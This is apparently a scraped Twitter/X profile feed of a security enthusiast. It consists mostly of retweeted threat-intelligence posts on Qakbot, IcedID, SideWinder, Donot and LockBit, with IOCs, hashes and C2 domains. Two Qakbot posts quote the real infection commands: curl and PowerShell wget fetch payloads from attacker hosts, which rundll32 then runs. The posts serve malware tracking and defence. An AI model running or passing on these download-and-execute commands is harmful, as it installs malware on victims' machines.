null

143 posts

null

null

@random_0_9

Phishing | VAPT | Red Team| Hacker Cypto Learner OSCP

earth Katılım Aralık 2021
477 Takip Edilen165 Takipçiler
null retweetledi
Cryptolaemus
Cryptolaemus@Cryptolaemus1·
#Qakbot - obama267 - .pdf > .zip > curl > .dll wscript.exe Calculation-of-costs.js cmd.exe /c mkdir C:\Poliset\Nolser & curl https://skagnechri.]com/0.29.dat --output C:\Poliset\Nolser\file.OOCCXX rundll32 C:\Poliset\Nolser\file.OOCCXX,menu IOC's github.com/pr0xylife/Qakb…
Cryptolaemus tweet media
English
3
39
104
33.8K
null retweetledi
Cryptolaemus
Cryptolaemus@Cryptolaemus1·
#Qakbot - obama248 - .xhtml > .wsf > ps > .dll wscript.exe AprilINV(f3354).wsf powershell.exe -ENC $Muckhole = ("http://45.66.248.25/vodka.dat") foreach ($Hydro in $Muckhole) {try {wget $Hydro -O $env:TEMP\vodka rundll32 $env:TEMP\vodka,X555 IOC's github.com/pr0xylife/Qakb…
Cryptolaemus tweet media
English
3
32
85
33.9K
null retweetledi
Gr@ve_Rose
Gr@ve_Rose@Grave_Rose·
At Starbucks today when a guy went to the washroom for about four minutes: - Bag left - Phone left - Laptop unlocked - RDP'd into a server - Code open Don't be this guy. #opsec #infosec #fail
Gr@ve_Rose tweet media
English
78
120
715
108.7K
null
null@random_0_9·
#smokeloader tread based on the targeting country
null tweet media
English
0
0
0
89
null
null@random_0_9·
@ryodan0x share the email header if possible
English
0
0
0
24
xRY0D4N
xRY0D4N@ryodan0x·
I took a look at #Qakbot the PDF has a button > download zip file > extract WSF script WSF script launches powershell powershell connecting to C2 domains and downloading DLL then executing it Yara rule and powershell script extracted: github.com/xRY0D4N/Yara-R… #malware
xRY0D4N tweet mediaxRY0D4N tweet mediaxRY0D4N tweet mediaxRY0D4N tweet media
English
2
4
16
1.3K
Jarrod
Jarrod@Jr0dR87·
So begins my journey to get the OSCP. Wish me luck.
English
21
0
107
5.8K
null retweetledi
Joshua Penny
Joshua Penny@josh_penny·
#Donot, linked to 🇮🇳#India, targets specific countries including 🇧🇩🇱🇰🇵🇰. They've expanded to embassies in the US and Europe, using "yty" #malware to attack Mil & Gov orgs. Despite being considered "low" in sophistication, they persist until they succeed. #APT IPs & Domains 👇👇
English
5
5
14
1.7K
null retweetledi
Dominic Alvieri
Dominic Alvieri@AlvieriD·
LockBit just reposted 9 companies ( [+] 2 new )all to leak within 24 hours except the Government of Medellín, Columbia which is set to leak in about 40 minutes. /medellin.gov.co #cybersecurity #infosec #lockbit
Dominic Alvieri tweet mediaDominic Alvieri tweet mediaDominic Alvieri tweet media
English
2
8
21
8.7K
null retweetledi
Arda Büyükkaya
Arda Büyükkaya@WhichbufferArda·
New Icedid Malware campaign Phishing Email > Encrypted ZIP > ISO image > LNK > DLL execution via Rundll32.exe f3a9b733cb33c4d257589e70c8d9cf4b5136cb3932bce2ea1b31bc9d5b06a5ae C2: trbiriumpa[.]com Unpacked Sample -> b1566f9c7ffa839554b96575e2a34ea79416f03df75b5048f561e96808975555
Arda Büyükkaya tweet media
English
3
24
81
17.4K
null retweetledi
t3ft3lb
t3ft3lb@t3ft3lb·
#APT #SideWinder zip -> lnk -> hta ZIP MD5: e5ea6fd2e0f6f546b5842cd9d4a45628 LNK MD5: 567e1394ecfa630a350f5014ed1ae229 URL: https://mail.tsinghua[.]institute/3206/1/25395/2/0/1/1863616521/3DIm0LGMztTur2KVczxFjB36rLfwnHf9DwWAo2oI/files-5b71f8ef/hta @Tsinghua_Uni could be a target
t3ft3lb tweet mediat3ft3lb tweet mediat3ft3lb tweet mediat3ft3lb tweet media
English
1
12
29
0